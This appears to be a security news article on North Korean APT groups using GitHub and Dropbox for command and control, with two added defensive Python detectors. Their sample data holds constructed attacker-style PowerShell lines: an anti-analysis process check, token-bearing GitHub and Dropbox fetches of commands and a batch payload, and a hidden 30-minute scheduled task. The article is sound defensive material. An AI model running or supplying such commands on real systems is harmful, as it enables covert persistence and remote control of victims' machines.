North Korean APTs Turn GitHub and Dropbox into Stealthy C2 Infrastructure

CyberSecureFox

North Korean state-linked threat actors are increasingly abusing legitimate cloud services such as GitHub and Dropbox as covert command-and-control (C2) channels, making their operations harder to detect and block. Recent investigations by Fortinet FortiGuard Labs, AhnLab and S2W highlight a series of campaigns targeting South Korean organizations that rely on LNK phishing, PowerShell scripts, Python backdoors and Hangul Word Processor (HWP) documents to gain and maintain access.

Cloud-based C2: a growing trend in North Korean APT operations

According to the research, at least two campaigns are attributed to the Kimsuky group, while a third is linked to the ScarCruft APT. All three operations share a common theme: abuse of trusted cloud platforms and “living off the land” binaries (LOLBins) such as PowerShell and Windows Task Scheduler instead of bulky, easily detectable malware.

This approach allows attackers to blend malicious traffic with normal user activity and to bypass traditional perimeter defenses that often whitelist popular services like GitHub and Dropbox. It also complicates incident response, as defenders must distinguish legitimate developer or file-sharing activity from hidden C2 communications.

Attack chain: LNK phishing, PowerShell and stealthy persistence

The first campaign described by Fortinet starts with a malicious Windows LNK file, likely delivered through spear-phishing emails. When the user opens the LNK shortcut, it simultaneously displays a decoy PDF document to appear legitimate and silently launches a PowerShell script in the background.

The PowerShell script immediately performs anti-analysis checks, scanning running processes for signs of virtual machines, debuggers or forensic tools. If such tools are detected, the script terminates to hinder malware analysis in sandboxed or laboratory environments.

If the checks pass, the script extracts a VBScript component and establishes persistence by creating a scheduled task that runs a hidden PowerShell payload every 30 minutes. This ensures long-term access even after system reboots while keeping visible artifacts to a minimum.

GitHub C2: masquerading as normal developer traffic

Once persistence is in place, the PowerShell malware profiles the compromised host, collecting system information, installed software details and environment data. The results are stored in a log file and uploaded to a GitHub repository controlled by an account named “motoralis”, using a hard-coded access token.

Researchers also identified related GitHub accounts such as “God0808RAMA”, “Pigresy80”, “entire73”, “pandora0009” and “brandonleeodd93-blip”, which appear to support the same infrastructure. The malware then reads a specific file in the repository to retrieve additional modules or instructions, effectively using GitHub as a remote control panel and data store.

Earlier iterations of this activity delivered the Xeno RAT family and its MoonPeak variant over GitHub, as documented by ENKI and Trellix, and were linked to Kimsuky. The current wave goes further by relying almost entirely on native Windows tools and scripts instead of custom executables, reducing the likelihood of detection by legacy antivirus solutions.

Dropbox-based C2 and Python backdoor in Kimsuky operations

A parallel Kimsuky campaign analyzed by AhnLab uses a similar LNK-based infection chain but switches to Dropbox as the C2 channel. The initial LNK launches a PowerShell script that creates a hidden directory “C:\windirr” and stores multiple payloads there, including a decoy PDF and a secondary LNK file pretending to be a Hangul Word Processor (HWP) document.

Additional intermediate components maintain persistence and invoke another PowerShell script that connects to Dropbox and downloads a batch (.BAT) file. This BAT script retrieves two parts of a ZIP archive from the domain “quickcon[.]store”, merges them, and extracts an XML Task Scheduler job along with a Python backdoor.

The scheduled task launches the Python implant, which supports a broad set of C2 commands: loading extra modules, executing shell commands, listing directories, uploading and downloading files, deleting data and running BAT, VBScript and EXE files. Such flexibility makes it a powerful tool for reconnaissance, lateral movement and long-term espionage inside victim networks.

ScarCruft evolves to HWP OLE droppers and RokRAT delivery

In a separate campaign, S2W observed the ScarCruft group moving away from classic LNK-based chains toward malicious OLE objects embedded in HWP documents. These documents deliver RokRAT, a remote access trojan believed to be used exclusively by ScarCruft.

The RokRAT payload is embedded as an OLE object and executed via DLL side-loading, a technique in which a legitimate application is tricked into loading a malicious DLL. Unlike older ScarCruft playbooks that relied on LNK files and BAT scripts to stage shellcode, the new method uses custom droppers and loaders to inject RokRAT more efficiently and stealthily, underscoring the continuous evolution of North Korean APT tooling.

Defence strategies: detecting abuse of GitHub, Dropbox and LOLBins

To counter these tactics, organizations should strengthen controls around script interpreters and built-in Windows utilities such as PowerShell, wscript and schtasks. Technologies like AppLocker or Windows Defender Application Control (WDAC), combined with centralized logging and analysis of PowerShell commands (including AMSI integration), can expose suspicious scripting activity early in the attack chain.
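The centralized PowerShell logging recommended above is only useful if someone triages what it collects. The following script is an added example written for this article (it is not code from Fortinet, AhnLab, S2W or CyberSecureFox) and shows how the behaviours described in the campaigns, such as process checks for analysis tools, hidden-window scheduled tasks and GitHub or Dropbox API calls carrying a token, can be scored in PowerShell Script Block Logging (Event ID 4104) text. It assumes the script block text has already been exported from the event log; the sample events, record numbers, hostnames, token strings and rule weights are all constructed for illustration.

```python
"""Score PowerShell Script Block Logging (Event ID 4104) text for the
LOLBin / cloud-C2 pattern described in the article. Added example;
the events below are constructed, not real telemetry."""
import re
from dataclasses import dataclass, field
from typing import List, Tuple

# Each rule: (name, weight, regex). Weights are illustrative assumptions.
RULES = [
    # Process listing followed by names of VM/analysis tooling (anti-analysis check)
    ("anti_analysis_process_check", 3, re.compile(
        r"Get-Process.{0,300}?(vmtoolsd|vboxservice|procmon|wireshark|x64dbg|ollydbg|fiddler|idaq)",
        re.I | re.S)),
    # Console window suppressed
    ("hidden_window", 2, re.compile(r"-W(indowStyle)?\s+Hidden", re.I)),
    # Persistence through Task Scheduler
    ("scheduled_task_creation", 3, re.compile(
        r"schtasks(\.exe)?\s+/create|Register-ScheduledTask", re.I)),
    # GitHub used as a transport
    ("github_api_use", 2, re.compile(r"api\.github\.com|raw\.githubusercontent\.com", re.I)),
    # Dropbox used as a transport
    ("dropbox_api_use", 2, re.compile(r"(content|api)\.dropboxapi\.com", re.I)),
    # A token or bearer credential embedded in the script itself
    ("hardcoded_auth_token", 3, re.compile(r"Authorization\W+(token|Bearer)\s+\S+", re.I)),
    # Base64-encoded command line
    ("encoded_command", 2, re.compile(
        r"-(e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}", re.I)),
]

ALERT_THRESHOLD = 5  # assumption: a single cloud API hit alone should not alert


@dataclass
class Finding:
    record_id: int
    host: str
    indicators: List[str] = field(default_factory=list)
    score: int = 0


def triage(events: List[Tuple[int, str, str]]) -> List[Finding]:
    """Return one Finding per event whose weighted indicator score reaches the threshold."""
    findings = []
    for record_id, host, text in events:
        f = Finding(record_id, host)
        for name, weight, rx in RULES:
            if rx.search(text):
                f.indicators.append(name)
                f.score += weight
        if f.score >= ALERT_THRESHOLD:
            findings.append(f)
    return findings


# Constructed sample script blocks: two benign, two modelled on the reported tradecraft.
SAMPLE_EVENTS = [
    (1, "WS-ADMIN01", "Get-Process | Where-Object {$_.CPU -gt 100} | Sort-Object CPU -Descending"),
    (2, "WS-DEV07", 'Invoke-RestMethod -Uri "https://api.github.com/repos/example-org/tools/releases/latest" '
                   '| Select-Object tag_name'),
    (3, "WS-HR12", "$p = Get-Process | Select-Object -ExpandProperty Name\n"
                   "if ($p -match 'vmtoolsd|procmon|wireshark') { exit }\n"
                   '$h = @{ Authorization = "token ghp_PLACEHOLDER_TOKEN" }\n'
                   'Invoke-RestMethod -Uri "https://api.github.com/repos/EXAMPLE_ACCOUNT/EXAMPLE_REPO/contents/cmd.txt" -Headers $h\n'
                   'schtasks /create /sc minute /mo 30 /tn "Updater" /tr "powershell -WindowStyle Hidden -File C:\\Users\\Public\\u.ps1"'),
    (4, "WS-FIN03", 'Invoke-WebRequest -Uri "https://content.dropboxapi.com/2/files/download" '
                    '-Headers @{ Authorization = "Bearer PLACEHOLDER_TOKEN" } -OutFile "C:\\windirr\\stage.bat"'),
]

if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS):
        print(f"record {f.record_id} on {f.host}: score {f.score}, {', '.join(f.indicators)}")
```

The threshold matters more than any single rule: a developer workstation calling the GitHub API scores 2 and stays silent, whereas the same API call combined with an embedded token and a hidden-window scheduled task crosses the line. Tune the weights against your own baseline of legitimate PowerShell use before deploying.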

Security teams should treat LNK files in email and attachments masquerading as HWP or PDF documents as high-risk. File-type filtering, sandbox detonation of suspicious attachments and regular security awareness training on phishing techniques significantly reduce the success rate of initial compromise.

Equally important is monitoring endpoints’ access to cloud services such as GitHub and Dropbox outside of normal usage patterns. Proxy and DLP rules, detection of unusual access tokens or repositories, and routine review of newly created Scheduled Tasks and services can reveal attempts to turn legitimate SaaS platforms into covert C2 channels.
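Routine review of scheduled tasks can be automated against exported task definitions. The script below is an added example for this article (not code from any of the cited vendors) that reads Task Scheduler XML, as produced by `schtasks /query /xml` or `Export-ScheduledTask`, and flags the persistence shape described in the Fortinet and AhnLab analyses: a script host such as PowerShell launched with hidden-window or bypass arguments on a short repetition interval. The three task definitions, their names and file paths are constructed for illustration; real exports are UTF-16 and should be read as bytes so the parser honours the declared encoding.

```python
"""Flag Task Scheduler definitions that match the hidden-PowerShell,
short-interval persistence pattern. Added example; the XML below is
constructed to mirror the structure of real exports."""
import re
import xml.etree.ElementTree as ET
from typing import Dict, List, Tuple

NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}
SCRIPT_HOSTS = re.compile(r"(powershell|pwsh|wscript|cscript|mshta)(\.exe)?$", re.I)
# Argument fragments worth a second look (illustrative list, extend from your own telemetry)
SUSPICIOUS_ARGS = re.compile(
    r"-W(indowStyle)?\s+Hidden|-(e|ec|enc|encodedcommand)\s|-(ep|ExecutionPolicy)\s+Bypass"
    r"|-nop\b|-NonInteractive|Users\\Public|AppData\\|\\windirr\\", re.I)


def iso_minutes(duration):
    """Convert the ISO 8601 duration subset Task Scheduler emits (PnDTnHnMnS) to minutes."""
    m = re.fullmatch(r"P(?:(\d+)D)?(?:T(?:(\d+)H)?(?:(\d+)M)?(?:(\d+)S)?)?", (duration or "").strip())
    if not m or not any(m.groups()):
        return None
    d, h, mi, s = (int(x) if x else 0 for x in m.groups())
    return d * 1440 + h * 60 + mi + s / 60


def review_task(xml_text: str, max_interval_minutes: int = 60) -> Tuple[bool, List[str]]:
    """Return (suspicious, reasons). Suspicious requires a script-host action plus one more signal."""
    root = ET.fromstring(xml_text)
    reasons = []
    for exec_el in root.findall(".//t:Actions/t:Exec", NS):
        cmd = exec_el.findtext("t:Command", default="", namespaces=NS).strip().strip('"')
        args = exec_el.findtext("t:Arguments", default="", namespaces=NS)
        if SCRIPT_HOSTS.search(cmd):
            reasons.append(f"script host action: {cmd}")
            if SUSPICIOUS_ARGS.search(args):
                reasons.append(f"suspicious arguments: {args[:60]}")
    intervals = [iso_minutes(el.text) for el in root.findall(".//t:Repetition/t:Interval", NS)]
    short = [i for i in intervals if i is not None and i <= max_interval_minutes]
    if short:
        reasons.append(f"repeats every {min(short):g} min")
    if root.findtext(".//t:Settings/t:Hidden", default="false", namespaces=NS).strip().lower() == "true":
        reasons.append("task hidden from UI")
    suspicious = any(r.startswith("script host") for r in reasons) and len(reasons) >= 2
    return suspicious, reasons


def review_all(tasks: List[Tuple[str, str]]) -> Dict[str, Tuple[bool, List[str]]]:
    return {name: review_task(xml) for name, xml in tasks}


_TASK_TMPL = """<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers>{trigger}</Triggers>
  <Settings><Hidden>{hidden}</Hidden></Settings>
  <Actions Context="Author"><Exec><Command>{cmd}</Command><Arguments>{args}</Arguments></Exec></Actions>
</Task>"""

# Constructed definitions: one modelled on the reported persistence, two benign.
SAMPLE_TASKS = [
    ("UpdaterCheck", _TASK_TMPL.format(
        trigger="<TimeTrigger><Repetition><Interval>PT30M</Interval></Repetition>"
                "<StartBoundary>2024-01-01T00:00:00</StartBoundary><Enabled>true</Enabled></TimeTrigger>",
        hidden="true", cmd="powershell.exe",
        args=r"-WindowStyle Hidden -ExecutionPolicy Bypass -File C:\Users\Public\update.ps1")),
    ("ExampleVendorUpdate", _TASK_TMPL.format(
        trigger="<CalendarTrigger><ScheduleByDay><DaysInterval>1</DaysInterval></ScheduleByDay></CalendarTrigger>",
        hidden="false", cmd=r"C:\Program Files\ExampleVendor\updater.exe", args="/silent")),
    ("NightlyCleanup", _TASK_TMPL.format(
        trigger="<CalendarTrigger><ScheduleByDay><DaysInterval>1</DaysInterval></ScheduleByDay></CalendarTrigger>",
        hidden="false", cmd="powershell.exe", args=r"-File C:\Scripts\cleanup.ps1")),
]

if __name__ == "__main__":
    for name, (flag, why) in review_all(SAMPLE_TASKS).items():
        print(f"{name}: {'SUSPICIOUS' if flag else 'ok'} {why}")
```

Requiring a script-host action plus at least one further signal keeps an ordinary nightly PowerShell maintenance task out of the alert list while the hidden, 30-minute, Users\Public variant is caught. Run it over tasks created in the last day or two, compared against a known-good baseline, and escalate anything new that triggers.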

Given the clear trend of North Korean APT groups leveraging cloud platforms and native Windows tools for stealthy command and control, organizations should revisit their threat models and detection strategies with these vectors in mind. Prioritizing proactive detection, automated script analysis and continuous user education will be critical to maintaining resilience against these increasingly sophisticated, cloud-enabled targeted attacks.
